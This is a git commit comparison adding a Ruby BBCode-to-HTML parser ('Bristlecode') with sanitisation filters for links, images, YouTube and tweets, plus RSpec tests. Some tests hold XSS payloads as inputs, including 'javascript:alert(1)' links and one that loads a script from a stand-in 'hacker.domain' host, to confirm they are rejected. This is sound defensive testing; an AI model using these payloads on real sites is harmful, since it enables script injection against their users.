Compare commits

...

19 Commits

2
.gitignore vendored

@ -0,0 +1,2 @@
bin
.bundle

@ -0,0 +1,4 @@
--tty
--color
--format documentation
--require spec_helper

@ -5,3 +5,8 @@ gem "thin"
gem "slim"
gem "bb-ruby"
gem "ruby-bbcode"
gem "rspec", "~> 3.0"
gem "parslet"
gem "guard"
gem "guard-rspec"
gem "sanitize"

@ -0,0 +1,110 @@
GEM
remote: http://rubygems.org/
specs:
activesupport (4.2.4)
i18n (~> 0.7)
json (~> 1.7, >= 1.7.7)
minitest (~> 5.1)
thread_safe (~> 0.3, >= 0.3.4)
tzinfo (~> 1.1)
bb-ruby (1.1.0)
blankslate (3.1.3)
celluloid (0.15.2)
timers (~> 1.1.0)
coderay (1.1.0)
crass (1.0.2)
daemons (1.2.3)
diff-lcs (1.2.5)
eventmachine (1.0.8)
ffi (1.9.3)
formatador (0.2.5)
guard (2.6.1)
formatador (>= 0.2.4)
listen (~> 2.7)
lumberjack (~> 1.0)
pry (>= 0.9.12)
thor (>= 0.18.1)
guard-rspec (4.3.1)
guard (~> 2.1)
rspec (>= 2.14, < 4.0)
i18n (0.7.0)
json (1.8.3)
listen (2.7.9)
celluloid (>= 0.15.2)
rb-fsevent (>= 0.9.3)
rb-inotify (>= 0.9)
lumberjack (1.0.9)
method_source (0.8.2)
mini_portile (0.6.2)
minitest (5.8.2)
nokogiri (1.6.6.2)
mini_portile (~> 0.6.0)
nokogumbo (1.4.1)
nokogiri
parslet (1.7.1)
blankslate (>= 2.0, <= 4.0)
pry (0.10.0)
coderay (~> 1.1.0)
method_source (~> 0.8.1)
slop (~> 3.4)
rack (1.6.4)
rack-protection (1.5.3)
rack
rb-fsevent (0.9.4)
rb-inotify (0.9.5)
ffi (>= 0.5.0)
rspec (3.1.0)
rspec-core (~> 3.1.0)
rspec-expectations (~> 3.1.0)
rspec-mocks (~> 3.1.0)
rspec-core (3.1.2)
rspec-support (~> 3.1.0)
rspec-expectations (3.1.0)
diff-lcs (>= 1.2.0, < 2.0)
rspec-support (~> 3.1.0)
rspec-mocks (3.1.0)
rspec-support (~> 3.1.0)
rspec-support (3.1.0)
ruby-bbcode (2.0.0)
activesupport (>= 3.2.3)
sanitize (4.0.0)
crass (~> 1.0.2)
nokogiri (>= 1.4.4)
nokogumbo (= 1.4.1)
sinatra (1.4.6)
rack (~> 1.4)
rack-protection (~> 1.4)
tilt (>= 1.3, < 3)
slim (3.0.6)
temple (~> 0.7.3)
tilt (>= 1.3.3, < 2.1)
slop (3.5.0)
temple (0.7.6)
thin (1.6.4)
daemons (~> 1.0, >= 1.0.9)
eventmachine (~> 1.0, >= 1.0.4)
rack (~> 1.0)
thor (0.19.1)
thread_safe (0.3.5)
tilt (2.0.1)
timers (1.1.0)
tzinfo (1.2.2)
thread_safe (~> 0.1)
PLATFORMS
ruby
DEPENDENCIES
bb-ruby
guard
guard-rspec
parslet
rspec (~> 3.0)
ruby-bbcode
sanitize
sinatra
slim
thin
BUNDLED WITH
1.10.6

@ -0,0 +1,4 @@
guard :rspec, cmd: 'bundle exec rspec' do
watch('bristlecode.rb') { "spec" }
watch(%r{^spec/.+(_spec\.rb)$}) { "spec" }
end

@ -3,8 +3,9 @@ require 'slim'
require 'digest/sha1'
require 'bb-ruby'
require 'ruby-bbcode'
require './bristlecode.rb'
@@engines = ['bb-ruby', 'ruby-bbcode', 'raw']
@@engines = ['bb-ruby', 'ruby-bbcode', 'bristle', 'raw']
get '/' do
@posts = list_posts
@ -35,6 +36,8 @@ def exec_bbcode(engine, body)
BBRuby.to_html body
when "ruby-bbcode"
RubyBBCode.to_html body
when "bristle"
Bristlecode::to_html body
when "raw"
body
else

@ -0,0 +1,370 @@
require 'parslet'
require 'sanitize'
require 'uri'
module Bristlecode
class YoutubeFilter
def call(env)
node = env[:node]
node_name = env[:node_name]
return if env[:is_whitelisted] || !node.element?
return unless node_name == 'iframe'
return unless node['src'] =~ %r|\A(?:https?:)?//(?:www\.)?youtube(?:-nocookie)?\.com/|
Sanitize.node!(node, {
:elements => %w[iframe],
:attributes => {'iframe' => %w[allowfullscreen frameborder height src width]}
})
{:node_whitelist => [node]}
end
end
class TweetFilter
def call(env)
node = env[:node]
node_name = env[:node_name]
return if env[:is_whitelisted] || !node.element?
case node_name
when 'script'
return script env
when 'blockquote'
return blockquote env
else
return
end
end
def script(env)
node = env[:node]
return unless node['src'] == "//platform.twitter.com/widgets.js"
Sanitize.node!(node, {
:elements => %w[script],
:attributes => {'script' => %w[aync src charset]}
})
{:node_whitelist => [node]}
end
def blockquote(env)
node = env[:node]
Sanitize.node!(node, {
:elements => %w[blockquote a],
:attributes => {'blockquote' => ['class'], 'a' => ['href']}
})
{:node_whitelist => [node]}
end
end
Config = Sanitize::Config::freeze_config(
:elements => %w[b em i strong u a strike br img],
:attributes => {
'a' => ['href'],
'img' => ['src'],
},
:add_attributes => {
'a' => {'rel' => 'nofollow'}
},
:protocols => {
'a' => {'href' => ['http', 'https', :relative]}
},
:transformers => [YoutubeFilter.new, TweetFilter.new],
:remove_contents => ['script']
)
def Bristlecode.to_html(text)
begin
parser = Bristlecode::Parser.new
parse_tree = parser.parse(text)
tree = Bristlecode::Transform.new.apply(parse_tree)
html = tree.to_html
rescue Parslet::ParseFailed => parse_error
html = text
end
Bristlecode.sanitize_html(html)
end
def Bristlecode.sanitize_html(html)
Sanitize.fragment(html, Bristlecode::Config)
end
def Bristlecode.clean!(text)
text.gsub!('&', '&amp;')
text.gsub!('<', '&lt;')
text.gsub!('>', '&gt;')
text.gsub!('"', '&quot;')
text.gsub!("'", '&#x27;')
text.gsub!('/', '&#x2F;')
end
class Parser < Parslet::Parser
rule(:bold_open) { str('[b]') | str('[B]') }
rule(:bold_close) { str('[/b]') | str('[/B]') | eof }
rule(:bold) { bold_open >> children.as(:bold) >> bold_close }
rule(:linebreak) { str('[br]').as(:br) }
rule(:italic_open) { str('[i]') | str('[I]') }
rule(:italic_close) { str('[/i]') | str('[/I]') | eof }
rule(:italic) { italic_open >> children.as(:italic) >> italic_close }
rule(:url_open) { str('[url]') }
rule(:url_close) { str('[/url]') | eof }
rule(:simple_href) { (url_close.absent? >> any).repeat }
rule(:simple_url) { url_open >> simple_href.as(:href) >> url_close }
rule(:url_title_open) { str('[url=') }
rule(:url_title_href) { (match(']').absent? >> any).repeat(1) }
rule(:url_with_title) {
url_title_open >>
url_title_href.as(:href) >>
match(']') >>
children.as(:title) >>
url_close
}
rule(:url) { (simple_url | url_with_title).as(:url) }
rule(:youtube_open) { str('[youtube]') }
rule(:youtube_close) { str('[/youtube]') }
rule(:youtube_url) { (youtube_close.absent? >> any).repeat(1) }
rule(:youtube) { (youtube_open >> youtube_url.as(:src) >> youtube_close).as(:youtube) }
rule(:tweet_open) { str('[tweet]') }
rule(:tweet_close) { str('[/tweet]') }
rule(:tweet_url) { (tweet_close.absent? >> any).repeat(1) }
rule(:tweet) { (tweet_open >> tweet_url.as(:src) >> tweet_close).as(:tweet) }
rule(:img_open) { str('[img]') }
rule(:img_close) { str('[/img]') }
rule(:img_src) { (img_close.absent? >> any).repeat(1) }
rule(:img) { (img_open >> img_src.as(:src) >> img_close).as(:img) }
rule(:eof) { any.absent? }
rule(:tag) { bold | italic | url | linebreak | img | youtube | tweet }
rule(:elem) { text.as(:text) | tag }
rule(:tag_open) { bold_open | italic_open | url_open | url_title_open | img_open |
youtube_open | tweet_open }
rule(:tag_close) { bold_close | italic_close | url_close | img_close | youtube_close |
tweet_close }
rule(:tag_delim) { tag_open | tag_close | linebreak }
rule(:text) { (tag_delim.absent? >> any).repeat(1) }
rule(:children) { elem.repeat }
rule(:doc) { elem.repeat.as(:doc) }
root(:doc)
end
class Transform < Parslet::Transform
rule(bold: sequence(:children)) { Bold.new(children) }
rule(italic: sequence(:children)) { Italic.new(children) }
rule(text: simple(:text)) { Text.new(text) }
rule(doc: subtree(:doc)) { Doc.new(doc) }
rule(url: subtree(:url)) { Url.new(url) }
rule(br: simple(:br)) { Linebreak.new }
rule(img: subtree(:img)) { Img.new(img) }
rule(youtube: subtree(:youtube)) { Youtube.new(youtube) }
rule(tweet: subtree(:tweet)) { Tweet.new(tweet) }
end
class Doc
attr_accessor :children
def initialize(children)
self.children = children
end
def to_html
s = StringIO.new
children.each{|child| s << child.to_html }
s.string
end
def to_text
s = StringIO.new
children.each{|child| s << child.to_text }
s.string
end
end
class Text
attr_accessor :text
def initialize(text)
self.text = text.to_str
Bristlecode.clean!(self.text)
end
def to_html
text
end
def to_text
text
end
end
class Bold
attr_accessor :children
def initialize(children)
self.children = Doc.new(children)
end
def to_html
"<b>#{children.to_html}</b>"
end
def to_text
"[b]#{children.to_text}[/b]"
end
end
class Italic
attr_accessor :children
def initialize(children)
self.children = Doc.new(children)
end
def to_html
"<i>#{children.to_html}</i>"
end
def to_text
"[i]#{children.to_text}[/i]"
end
end
class Url
attr_accessor :href, :title, :bad_href, :title_supplied
def initialize(args)
self.href = args[:href].to_str.strip
if args.has_key? :title
self.title_supplied = true
self.title = Doc.new(args[:title])
else
self.title_supplied = false
self.title = Text.new(args[:href].to_str.strip)
end
end
def href_ok?
href =~ /^(\/|https?:\/\/)/
end
def to_html
return to_text unless href_ok?
"<a href=\"#{href}\">#{title.to_html}</a>"
end
def to_text
if title_supplied
"[url=#{href}]#{title.to_text}[/url]"
else
text = "[url]#{href}[/url]"
Bristlecode.clean!(text)
text
end
end
end
class Linebreak
def to_html
"<br>"
end
def to_text
"[br]"
end
end
class Img
attr_accessor :src
def initialize(img)
self.src = img[:src].to_str
end
def src_ok?
src =~ /^(\/|https?:\/\/)/
end
def to_html
return to_text unless src_ok?
"<img src=\"#{src}\">"
end
def to_text
text = "[img]#{src}[/img]"
Bristlecode.clean!(text)
text
end
end
class Youtube
attr_accessor :raw_url, :video_id
def initialize(args)
self.raw_url = args[:src].to_str.strip
self.video_id = parse_url
end
def parse_url
begin
uri = URI::parse(raw_url)
return false unless ['http', 'https'].include? uri.scheme
return false unless ['www.youtube.com', 'youtube.com', 'youtu.be'].include? uri.host
if uri.host == 'youtu.be'
return uri.path[1..-1]
else
URI::decode_www_form(uri.query).each{|key, value| return value if key == 'v'}
end
rescue URI::InvalidURIError
end
return false
end
def to_html
return to_text unless video_id
"<iframe width=\"560\" height=\"315\" src=\"https://www.youtube.com/embed/#{video_id}\" frameborder=\"0\" allowfullscreen></iframe>"
end
def to_text
text = "[youtube]#{raw_url}[/youtube]"
Bristlecode.clean!(text)
text
end
end
class Tweet
attr_accessor :raw_url, :tweet_url
def initialize(tweet)
self.raw_url = tweet[:src].to_str.strip
self.tweet_url = parse_url(self.raw_url)
end
def parse_url(url_in)
begin
uri = URI::parse(url_in)
return false unless ['http', 'https'].include? uri.scheme
return false unless uri.host == 'twitter.com'
return false unless uri.path =~ /^\/[^\/]+\/status\/\d+/
# strip querystring and fragment
return "#{uri.scheme}://#{uri.host}#{uri.path}"
rescue URI::InvalidURIError
end
return false
end
def to_html
return to_text unless tweet_url
"<blockquote class=\"twitter-tweet\"><a href=\"#{tweet_url}\"></a></blockquote><script async src=\"//platform.twitter.com/widgets.js\" charset=\"utf-8\"></script>"
end
def to_text
text = "[tweet]#{raw_url}[/tweet]"
Bristlecode.clean!(text)
text
end
end
end

@ -0,0 +1 @@
before the italics [i] in the italics [/i] after the italics

@ -0,0 +1,299 @@
require 'parslet/rig/rspec'
require_relative '../../bristlecode.rb'
module Bristlecode
describe '.to_html' do
def to_html(text)
Bristlecode.to_html(text)
end
def sanitize_html(text)
Bristlecode.sanitize_html(text)
end
it 'leaves an empty string unchanged' do
expect(to_html("")).to eq("")
end
it 'handles empty documents' do
text = " \t \n \n \t"
expect(to_html(text)).to eq(text)
end
it 'handles special chars' do
expect(to_html('&')).to eq('&amp;')
expect(to_html('>')).to eq('&gt;')
expect(to_html('<')).to eq('&lt;')
end
it 'escapes tags' do
input = '<script>alert(1)</script>'
output = '&lt;script&gt;alert(1)&lt;/script&gt;'
expect(to_html(input)).to eq(output)
end
it 'entirely removes unapproved script tags in sanitization' do
input = '<script>alert(1)</script>'
expect(sanitize_html(input)).to eq('')
end
it 'handles plain text just fine' do
expect(to_html("plaintext")).to eq("plaintext")
end
it 'can bold stuff' do
expect(to_html("[b]bold[/b]")).to eq("<b>bold</b>")
end
it 'can italic stuff' do
expect(to_html("[i]italic[/i]")).to eq("<i>italic</i>")
end
it 'can nest tags' do
doc = '[b] bold [i] italic [/i] bold [/b]'
expected = '<b> bold <i> italic </i> bold </b>'
out = to_html(doc)
expect(out).to eq(expected)
doc = '[i] italic [b] bold [/b] italic [/i]'
expected = '<i> italic <b> bold </b> italic </i>'
out = to_html(doc)
expect(out).to eq(expected)
end
it 'auto-closes tags at eof' do
expect(to_html("[b]bold")).to eq("<b>bold</b>")
expect(to_html("[i]italic")).to eq("<i>italic</i>")
end
it 'can render simple links' do
input = '[url]http://example.com[/url]'
output = '<a href="http://example.com" rel="nofollow">http://example.com</a>'
expect(to_html(input)).to eq(output)
end
it 'trims whitespace around urls' do
input = '[url] http://example.com [/url]'
output = '<a href="http://example.com" rel="nofollow">http://example.com</a>'
expect(to_html(input)).to eq(output)
end
it 'passes simple url contents opaquely' do
input = '[url]http://x[b]y[/b]z[/url]'
output = '<a href="http://x%5Bb%5Dy%5B/b%5Dz" rel="nofollow">http://x[b]y[/b]z</a>'
expect(to_html(input)).to eq(output)
end
it 'handles urls with titles' do
input = '[url=http://google.com]the google[/url]'
output = '<a href="http://google.com" rel="nofollow">the google</a>'
expect(to_html(input)).to eq(output)
end
it 'ignores url tags with bad protocols' do
input = '[url=javascript:alert(1)]google.com[/url]'
expect(to_html(input)).to eq(input)
input = '[url=ftp://something.com/filez]google.com[/url]'
expect(to_html(input)).to eq(input)
end
it 'allows subtrees in <a> tags' do
input = '[url=http://google.com]this is [b]the[/b] google[/url]'
output = '<a href="http://google.com" rel="nofollow">this is <b>the</b> google</a>'
expect(to_html(input)).to eq(output)
end
it 'rejects bad url protocols' do
input = "[url=javascript:t=document.createElement('script');t.src='//hacker.domain/script.js';document.body.appendChild(t);//]test[/url]"
expect(to_html(input)).to eq(input)
input = "[url=ftp://whatever.com/etc]warez[/url]"
expect(to_html(input)).to eq(input)
end
it 'renders a linebreak' do
expect(to_html('[br]')).to eq('<br>')
end
it 'renders an image' do
input = '[img]http://example.com/cat.gif[/img]'
expect(to_html(input)).to eq('<img src="http://example.com/cat.gif">')
end
it 'ignores bad image src protocols' do
input = '[img]javascript:alert(1)[/img]'
expect(to_html(input)).to eq(input)
input = '[img]ftp://example.com/cat.gif[/img]'
expect(to_html(input)).to eq(input)
end
it 'returns the original text on parse failure' do
input = '[img]http://example.com/dog.gif[img]http://example.com/cat.gif[/img][/img]'
expect(to_html(input)).to eq(input)
input = '[url][url]x[/url][/url]'
expect(to_html(input)).to eq(input)
end
it 'can render a youtube video with a watch link' do
input = '[youtube]https://youtube.com/watch?v=uxpDa-c-4Mc[/youtube]'
output = '<iframe width="560" height="315" src="https://www.youtube.com/embed/uxpDa-c-4Mc" frameborder="0" allowfullscreen=""></iframe>'
expect(to_html(input)).to eq(output)
input = '[youtube]https://www.youtube.com/watch?v=uxpDa-c-4Mc[/youtube]'
output = '<iframe width="560" height="315" src="https://www.youtube.com/embed/uxpDa-c-4Mc" frameborder="0" allowfullscreen=""></iframe>'
expect(to_html(input)).to eq(output)
end
it 'can render a youtube video with a share link' do
input = '[youtube]https://youtu.be/uxpDa-c-4Mc[/youtube]'
output = '<iframe width="560" height="315" src="https://www.youtube.com/embed/uxpDa-c-4Mc" frameborder="0" allowfullscreen=""></iframe>'
expect(to_html(input)).to eq(output)
end
it 'refuses bad youtube urls' do
input = '[youtube]http://example.com/cats.gif[/youtube]'
expect(to_html(input)).to eq(input)
end
it "requires full url for youtube vids" do
input = '[youtube]dQw4w9WgXcQ[/youtube]'
expect(to_html(input)).to eq(input)
end
it 'can render a tweet' do
input = '[tweet]https://twitter.com/jordanorelli/status/662654098156748800[/tweet]'
output = '<blockquote class="twitter-tweet"><a href="https://twitter.com/jordanorelli/status/662654098156748800" rel="nofollow"></a></blockquote><script src="//platform.twitter.com/widgets.js" charset="utf-8"></script>'
expect(to_html(input)).to eq(output)
end
it 'requres the full url for a tweet' do
input = '[tweet]662654098156748800[/tweet]'
expect(to_html(input)).to eq(input)
end
end
describe Parser do
let(:parser) { Parser.new }
describe '#parse' do
it 'can parse an empty string' do
expect(parser).to parse('')
end
it 'can parse whitespace' do
expect(parser).to parse(' ')
end
it 'can parse plain text' do
expect(parser).to parse('this is some plain text')
end
end
describe '#bold' do
it 'can parse correct bold text syntax' do
expect(parser.bold).to parse('[b]bolded contents here[/b]')
expect(parser.bold).to parse('[b]bolded contents here[/B]')
expect(parser.bold).to parse('[B]bolded contents here[/b]')
expect(parser.bold).to parse('[B]bolded contents here[/B]')
end
it 'can parse an empty bold tag' do
expect(parser.bold).to parse('[b][/b]')
end
it 'can parse nested tags' do
expect(parser.bold).to parse('[b] one [b] two [/b] three [/b]')
expect(parser.bold).to parse('[b] one [i] two [/i] three [/b]')
end
it 'can parse an unclosed tag' do
expect(parser.bold).to parse('[b]bolded contents here')
expect(parser.bold).to parse('[B]bolded contents here')
end
it 'fails non-bold text' do
expect(parser.bold).not_to parse('this is not bold')
end
it 'fails dangling close tags' do
expect(parser.bold).not_to parse('before [/b] after')
end
it 'fails nonsense tag' do
expect(parser.bold).not_to parse('[bold]fake content[/bold]')
end
end
describe '#italic' do
it 'can parse correct italic text syntax' do
expect(parser.italic).to parse('[i]italiced contents here[/i]')
expect(parser.italic).to parse('[i]italiced contents here[/I]')
expect(parser.italic).to parse('[I]italiced contents here[/i]')
expect(parser.italic).to parse('[I]italiced contents here[/I]')
end
it 'can parse an empty italic tag' do
expect(parser.italic).to parse('[i][/i]')
end
it 'can parse nested tags' do
expect(parser.italic).to parse('[i] one [i] two [/i] three [/i]')
expect(parser.italic).to parse('[i] one [b] two [/b] three [/i]')
end
it 'can parse an unclosed tag' do
expect(parser.italic).to parse('[i]italiced contents here')
expect(parser.italic).to parse('[I]italiced contents here')
end
it 'fails non-italic text' do
expect(parser.italic).not_to parse('this is not italic')
end
it 'fails dangling close tags' do
expect(parser.italic).not_to parse('before [/i] after')
end
it 'fails nonsense tag' do
expect(parser.italic).not_to parse('[italic]fake content[/italic]')
end
end
describe '#url' do
it 'can parse correct urls' do
expect(parser.url).to parse('[url]google.com[/url]')
expect(parser.url).to parse('[url=google.com]google[/url]')
end
it 'can parse title subtrees' do
expect(parser.url).to parse('[url=google.com]this is [b]google[/b] yo[/url]')
end
it "doesn't die on elements nested in simple urls" do
expect(parser.url).to parse('[url]goog[b]le.c[/b]om[/url]')
end
it 'fails nested [url] tags' do
expect(parser.url).not_to parse('[url]x[url]y[/url]z[/url]')
end
end
describe '#linebreak' do
it 'does its thing' do
expect(parser.linebreak).to parse('[br]')
end
end
describe '#img' do
it 'accepts valid image urls' do
expect(parser.img).to parse('[img]http://example.com/something.gif[/img]')
expect(parser.img).to parse('[img]https://example.com/something.gif[/img]')
end
end
end
end

@ -0,0 +1,9 @@
RSpec.configure do |config|
config.expect_with :rspec do |expect|
expect.include_chain_clauses_in_custom_matcher_descriptions = true
end
config.mock_with :rspec do |mocks|
mocks.verify_partial_doubles = true
end
end
Loading…
Cancel
Save